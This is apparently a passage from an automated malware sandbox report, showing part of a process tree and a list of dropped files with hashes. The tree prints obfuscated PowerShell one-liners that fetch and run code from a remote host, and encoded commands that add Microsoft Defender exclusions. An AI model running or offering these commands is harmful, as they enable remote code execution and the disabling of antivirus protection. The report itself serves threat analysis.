                                                                                              powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                              8⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              PID:3136
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            "C:\Windows\system32\svchost.exe"
                                                                                            7⤵
                                                                                            • Downloads MZ/PE file
                                                                                            • Adds Run key to start application
                                                                                            PID:7364
                                                                                            • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                              "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                              8⤵
                                                                                              • Sets service image path in registry
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious behavior: LoadsDriver
                                                                                              PID:6676
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell Remove-MpPreference -ExclusionPath C:\
                                                                                                9⤵
                                                                                                  PID:13232
                                                                                              • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                                8⤵
                                                                                                • Deletes itself
                                                                                                • Executes dropped EXE
                                                                                                PID:6232
                                                                                          • C:\Users\Admin\AppData\Local\Temp\10301420101\tK0oYx3.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\10301420101\tK0oYx3.exe"
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:12856
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                              7⤵
                                                                                                PID:13092
                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                7⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:13100
                                                                                            • C:\Users\Admin\AppData\Local\Temp\10301430101\ARxx7NW.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\10301430101\ARxx7NW.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Drops file in Program Files directory
                                                                                              PID:4144
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
                                                                                                7⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                PID:5352
                                                                                              • C:\Program Files\RuntimeApp\0000012056.exe
                                                                                                "C:\Program Files\RuntimeApp\0000012056.exe"
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5724
                                                                                  • C:\Windows\system32\conhost.exe
                                                                                    conhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
                                                                                    1⤵
                                                                                    • Process spawned unexpected child process
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3712
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
                                                                                      2⤵
                                                                                      • Blocklisted process makes network request
                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:2732
                                                                                  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                    1⤵
                                                                                      PID:4140
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                      1⤵
                                                                                        PID:2524
                                                                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                        1⤵
                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                        • Checks BIOS information in registry
                                                                                        • Executes dropped EXE
                                                                                        • Identifies Wine through registry keys
                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:5296
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                        1⤵
                                                                                          PID:5776
                                                                                        • C:\Windows\system32\conhost.exe
                                                                                          conhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
                                                                                          1⤵
                                                                                          • Process spawned unexpected child process
                                                                                          PID:6300
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
                                                                                            2⤵
                                                                                            • Blocklisted process makes network request
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            PID:6344
                                                                                        • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                          1⤵
                                                                                            PID:2592
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                            1⤵
                                                                                              PID:5076
                                                                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                              1⤵
                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                              • Checks BIOS information in registry
                                                                                              • Executes dropped EXE
                                                                                              • Identifies Wine through registry keys
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              PID:8092
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 8068 -ip 8068
                                                                                              1⤵
                                                                                                PID:12968
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBEAEQALQBtAFAAcAByAEUAZgBlAFIAZQBOAGMAZQAgAC0AZQBYAGMATAB1AHMAaQBPAG4AUABhAHQASAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVAB5AHAAZQBJAGQAXABBAHQAdAByAGkAYgB1AHQAZQBzAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXAAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAE8AcgBDAEUAOwAgAGEAZABEAC0AbQBwAFAAUgBFAEYARQBSAEUATgBDAEUAIAAtAGUAWABDAEwAdQBzAEkAbwBOAFAAcgBPAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABUAHkAcABlAEkAZABcAEEAdAB0AHIAaQBiAHUAdABlAHMALgBlAHgAZQAgAC0AZgBPAHIAQwBlAA==
                                                                                                1⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                PID:9840

                                                                                              Network

                                                                                              MITRE ATT&CK Enterprise v15

                                                                                              Replay Monitor

                                                                                              Loading Replay Monitor...

                                                                                              Downloads

                                                                                              • C:\ProgramData\BAFCGIJDAFBKFIECBGCA

                                                                                                Filesize

                                                                                                6KB

                                                                                                MD5

                                                                                                5a2a0702f198d081fc78849bff104d03

                                                                                                SHA1

                                                                                                d999d700b6a184fbb53297e7c40c986b8dce6b22

                                                                                                SHA256

                                                                                                96cf4b65df3caf7cad603217383073d52efb33ad90cc82177440440c0f363bdd

                                                                                                SHA512

                                                                                                9922140806db68b3a687523e4cee522ef49eed389417bb6e68d28e7bc20b65099ea5e5edbf4d4fd9d28113fdfb9f6e4fc9a1572a7bf5101d12631c6e461300ff

                                                                                              • C:\ProgramData\mozglue.dll

                                                                                                Filesize

                                                                                                593KB

                                                                                                MD5

                                                                                                c8fd9be83bc728cc04beffafc2907fe9

                                                                                                SHA1

                                                                                                95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                SHA256

                                                                                                ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                SHA512

                                                                                                fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                              • C:\ProgramData\wbaa1\djmo8g

                                                                                                Filesize

                                                                                                130KB

                                                                                                MD5

                                                                                                b33d9aa8389eb13e907085a77234e34e

                                                                                                SHA1

                                                                                                83935f3310d27e31260821a2f233a77cacf5402e

                                                                                                SHA256

                                                                                                bfef543edcd06c1f48237cd4d3a398c1011179efee8d98905e84a734002128d1

                                                                                                SHA512

                                                                                                80c2627f65437a929b5a3285bd7291043182938dfd61d06fe653d38ba3fc7e9acf428712ebf4142c27e6523a8e9262d99cad4ec99a74b9da91c0a5b287109bab

                                                                                              • C:\Temp\RqgykxeXb.hta

                                                                                                Filesize

                                                                                                779B

                                                                                                MD5

                                                                                                39c8cd50176057af3728802964f92d49

                                                                                                SHA1

                                                                                                68fc10a10997d7ad00142fc0de393fe3500c8017

                                                                                                SHA256

                                                                                                f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84

                                                                                                SHA512

                                                                                                cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6

                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                40B

                                                                                                MD5

                                                                                                d56cf9f768092279fa5b9e3247256148

                                                                                                SHA1

                                                                                                05b943e4043cbd5ec65762ffc0359e578c440ee3

                                                                                                SHA256

                                                                                                8cbbc9983b60f07744442f8863f6148ded79f7cd8c654a84df6243ea27037722

                                                                                                SHA512

                                                                                                1cd9641cbcc4dd04326afa94f9373f576a31f26c752747b8554b06ef0ebf16ba78462cbdba859d95e57e0217cd8e2e01904a280327b61f7f3daca292b4d3a663

                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\0025456d-a12d-4158-b750-525a2fd88edb.tmp

                                                                                                Filesize

                                                                                                1B

                                                                                                MD5

                                                                                                5058f1af8388633f609cadb75a75dc9d

                                                                                                SHA1

                                                                                                3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                SHA256

                                                                                                cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                SHA512

                                                                                                0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                Filesize

                                                                                                649B

                                                                                                MD5

                                                                                                47fb8ae852e527d8b742f0fa39032239

                                                                                                SHA1

                                                                                                5e0b6ee517bc60dd3466e6a41e3beca4bf02d027

                                                                                                SHA256

                                                                                                28aad679d102450a2a67a9ed00d9b137acab97b417527f23ceff539674534f34

                                                                                                SHA512

                                                                                                0c93dbd6472cc0386944d62e2f7acd8d16f68cd4c9eb622ed29c2a2234dceff412ee8a2a3486c574f0e97be4f9e45a39812a0e3f5c94a0dcdfb9eab8dae11d84

                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                Filesize

                                                                                                2B

                                                                                                MD5

                                                                                                d751713988987e9331980363e24189ce

                                                                                                SHA1

                                                                                                97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                SHA256

                                                                                                4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                SHA512

                                                                                                b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                Filesize

                                                                                                80KB

                                                                                                MD5

                                                                                                2facb5a19678374f4268734518b7dbd1

                                                                                                SHA1

                                                                                                2484ef7423fba52a1f1b4c442d9e02cf7764379d

                                                                                                SHA256

                                                                                                5c9cc5da82b73eb5db81b6127c4e6f5caad6488bac0efca8d3a4cdd900b3d666

                                                                                                SHA512

                                                                                                8b6307cfa43166cfbfbb2f8a9b6cd87b5ee94306c0bed2c5ecd8ad1cae4eccb6716a53e27016a45a3cabd8d6a529443e584f85b3b29ec81452f78c71585bcc1a

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                Filesize

                                                                                                3KB

                                                                                                MD5

                                                                                                f41839a3fe2888c8b3050197bc9a0a05

                                                                                                SHA1

                                                                                                0798941aaf7a53a11ea9ed589752890aee069729

                                                                                                SHA256

                                                                                                224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

                                                                                                SHA512

                                                                                                2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                Filesize

                                                                                                2KB

                                                                                                MD5

                                                                                                25604a2821749d30ca35877a7669dff9

                                                                                                SHA1

                                                                                                49c624275363c7b6768452db6868f8100aa967be

                                                                                                SHA256

                                                                                                7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

                                                                                                SHA512

                                                                                                206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                280B

                                                                                                MD5

                                                                                                c0c20b1e1e1c5dcd56a4e47887558fa9

                                                                                                SHA1

                                                                                                e8e7a484cc90573c488376cca50997f4c7eab7b2

                                                                                                SHA256

                                                                                                0325f71ecc9bdf4bd5cfd4b93381e785df4d7da61d6818446d4933336d24bb38

                                                                                                SHA512

                                                                                                49f8efd528c7e1298f8a1724a1d8e63993f7c0138d9fb6ee05b6d4cdff949dc91685612eb21c01f0e543742e16a663332a4ecc94fc08b3271632a2120758ecc0

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                280B

                                                                                                MD5

                                                                                                df2d1721cd4e4eff7049314710dc7c11

                                                                                                SHA1

                                                                                                f5aed0158b2c0a00302f743841188881d811637a

                                                                                                SHA256

                                                                                                ba336ffd1b01965d7ab0e5fac5415e43cb594139c76b19e4c0d9b5b3b67c1e93

                                                                                                SHA512

                                                                                                11fd520176193f284563c7d050e6a7ab4e9895bac49fdc05759bab2c8a69f224858ccc784b351fc1d3ee5d39345430f9234623c9390978d7daf6a08ff5576ef4

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

                                                                                                Filesize

                                                                                                2B

                                                                                                MD5

                                                                                                99914b932bd37a50b983c5e7c90ae93b

                                                                                                SHA1

                                                                                                bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                                SHA256

                                                                                                44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                                SHA512

                                                                                                27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\CURRENT

                                                                                                Filesize

                                                                                                16B

                                                                                                MD5

                                                                                                46295cac801e5d4857d09837238a6394

                                                                                                SHA1

                                                                                                44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                SHA256

                                                                                                0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                SHA512

                                                                                                8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\MANIFEST-000001

                                                                                                Filesize

                                                                                                23B

                                                                                                MD5

                                                                                                3fd11ff447c1ee23538dc4d9724427a3

                                                                                                SHA1

                                                                                                1335e6f71cc4e3cf7025233523b4760f8893e9c9

                                                                                                SHA256

                                                                                                720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

                                                                                                SHA512

                                                                                                10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

                                                                                                Filesize

                                                                                                327B

                                                                                                MD5

                                                                                                f936c756cff74361d1ad9ef09794361e

                                                                                                SHA1

                                                                                                97cd894a1153395d0430c2f671dbe8a6b84343df

                                                                                                SHA256

                                                                                                5b0998881c3b4963a892c3016399478a66de0d1a4ba693f0c6120609bb28276a

                                                                                                SHA512

                                                                                                ee25373b19da2323641609954f1833e8a03a684be748d0bb0e505c1b7669798afd444156bc601620e2f6d83bd9b2df68176564b57f1df1f87d6cc2b5403da800

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

                                                                                                Filesize

                                                                                                22KB

                                                                                                MD5

                                                                                                778c4cbcb8db45aea38c477af000d476

                                                                                                SHA1

                                                                                                8d9d0afb17d303d4706fd16aac15934cf3fb4145

                                                                                                SHA256

                                                                                                3f5d61b0b6a1a5f06505181c2904811bc4dba1bff6aef53ecb9118e22f9644c5

                                                                                                SHA512

                                                                                                f16b571a638efee176797e76573a9d0a6c343651fac31514343c14fe764df59117b8df8d91619513a5cdcfc2c81b3e492826defb60fe18737a454e6c2ca0abaf

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                Filesize

                                                                                                228KB

                                                                                                MD5

                                                                                                da5ab1526b93ea69c4304c687a2a6123

                                                                                                SHA1

                                                                                                2dd859517a534db596dba68e66078b9e01c28112

                                                                                                SHA256

                                                                                                514aac4c788a3a09b9966ddf24cc4b35740c74ca4c7e928c8ffdb48b0c3860b2

                                                                                                SHA512

                                                                                                3643eadbedfcc00875a31e79690bfd80b1c0a644da1b04ff6af340bec33aea7dac60c0478885783d769a7ec41527d8286daf802984e020c2308bd2c396ac9350

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                Filesize

                                                                                                40KB

                                                                                                MD5

                                                                                                c532422d4bd57a809c865224aa226353

                                                                                                SHA1

                                                                                                340ab8522a3181dcd047bef76e20d5a7ddf36caf

                                                                                                SHA256

                                                                                                3b192e88cf7d1ec3e39fa83c937682251c645a17130d13616620494379a0ee11

                                                                                                SHA512

                                                                                                341de17d03697e0b914494cba6cc34563d2cfaf5a7ff88fc472747558468d1b8916f7732a7029dd3e99ba206a703a5b6852eb24e90972b2670417a6de0cab500

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                Filesize

                                                                                                2KB

                                                                                                MD5

                                                                                                a78de29388251a9247c68f24d57daf08

                                                                                                SHA1

                                                                                                04057f8714c43c1a36d6e6c49bfe3a31af4b5760

                                                                                                SHA256

                                                                                                cca971746a31a625666d0fdb3b59fd5c096e0d508d8cb4c4a57b3bbfaea0f5d3

                                                                                                SHA512

                                                                                                8e5f114a64a3e8083b671d4fdf4688803f009c464439950b9f2019e4f0099fe60737124d0ab35832cfb6fec460021c1ccebfd610f7c279d9b6cf7ef313acdb9f

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Filesize

                                                                                                16KB

                                                                                                MD5

                                                                                                c839c0f0697ff5388be9a2e9cc22d30c

                                                                                                SHA1

                                                                                                60dd07cf12b1c3b8ac322863ac1d8d7b28d0623f

                                                                                                SHA256

                                                                                                5341147598976b51d233dc6fe44697667e09aebf59fbf02bcf3fc6ddc4824f95

                                                                                                SHA512

                                                                                                3e081d4427c4c5d0439d0849aede83d41e3438ff25e36f7f6578076097ab4954a474056ae63d28595107826005423ee9217115835d2c4706129321df1748d02a

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Filesize

                                                                                                64B

                                                                                                MD5

                                                                                                d2d491341b480e1c483f2dd3f139e9c6

                                                                                                SHA1

                                                                                                28ff1788f60ad7db8246e0013e04f9d372ccadc3

                                                                                                SHA256

                                                                                                c88329f43f350ebb1bb588f38b4e8b6854a23c0881bb2eea8ccba0351c9d5389

                                                                                                SHA512

                                                                                                13d4406003b86a792d26d284d7d0b544f23072ad9f5bb120e444b290a9b76f13578c37445cdd3c9c77b8dacbed22a22ad3950ce5ff0c9e99cc1286e22a9a9258

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Filesize

                                                                                                1KB

                                                                                                MD5

                                                                                                1a225805d94bfda620f74727d66332f1

                                                                                                SHA1

                                                                                                9dbd711c6eaeb3383951f543630403e409290305

                                                                                                SHA256

                                                                                                b3689318148b195221b54762da0a8a5cfe7538f5d6f5f57e70d47723d750dd26

                                                                                                SHA512

                                                                                                6bc9dcedc36740884225a41670043caf81e32dc24fd760286a973ffa9541ae58d24f45dfaaeb92d64d8151a1c6122a513b48398a7d8356f023174035a5b3ca48

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Filesize

                                                                                                17KB

                                                                                                MD5

                                                                                                9824c1c33ef3235ae22b7cc019cc1593

                                                                                                SHA1

                                                                                                d0237cc846f722c3c4ce5db1e7cc1144b5972d5c

                                                                                                SHA256

                                                                                                cd0a51ecb3edb910b1d80b626eb5c5b79400f3c1288844a1507e92cfb9eadf0c

                                                                                                SHA512

                                                                                                26dfd97e8e8cc9981392cb7f7eda423fdd0e2e155a78ec9c7628872842be87a85ecae054c692e7190f10fb480bf64cad89d93d45f6aff25843d864920ad9c9ed

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Filesize

                                                                                                17KB

                                                                                                MD5

                                                                                                366c589cd440a8b06ca858c438ad0976

                                                                                                SHA1

                                                                                                7520dbbdcf41540282c45dfe8a81a3086230b91f

                                                                                                SHA256

                                                                                                21da8cd66918736921f663cedcb4dd324c8fda2888657c7b057c8b1c89948eef

                                                                                                SHA512

                                                                                                ca9c85223bb14da6cdf5c7d2f1501984079f2c7e45d652aa883f1a2582618d917aa83dae0a51c6ceab871a1fb6023c1c17fcaad26d9a63b4169136ad2c73aa67

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Filesize

                                                                                                17KB

                                                                                                MD5

                                                                                                7be138511860b6689b26d1279cc4698f

                                                                                                SHA1

                                                                                                965794745db0cb78705cb3646f10e71287ecbcbe

                                                                                                SHA256

                                                                                                e3f60f3025f6f1dfa88b5c37958b40e0fa477c2a7733774249531ab70e674d96

                                                                                                SHA512

                                                                                                9d0f84114d0142658726a3670c56458eb359705af00916847bdaf9e757b2ac349347ade053a8d0518e7e33b1539d84ecc693897d16d74f63a3df4023fedc6527

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Filesize

                                                                                                16KB

                                                                                                MD5

                                                                                                f097b0b8e6bd7fa88eb3ed00847e486c

                                                                                                SHA1

                                                                                                c361b25c86f432ffdeaa9515937f0c2c623c7d94

                                                                                                SHA256

                                                                                                533965390dc47f4b668dbbe156fcc519f4f3feacd2cb93a0bb0dc1620e3add83

                                                                                                SHA512

                                                                                                bfe0207b0b9fb280f1fe67967b5da68cf0655253ba04ecbc96de2a66b7673cdc66c0746e0eacd50903e2d5ee59c02aa455288b7d0a56cfe1b48680405e2e063b

                                                                                              • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ahkgvp67.default-release\cache2\entries\E19316B1CDA62317F9DA2551F9B56E711FCC77AD

                                                                                                Filesize

                                                                                                13KB

                                                                                                MD5

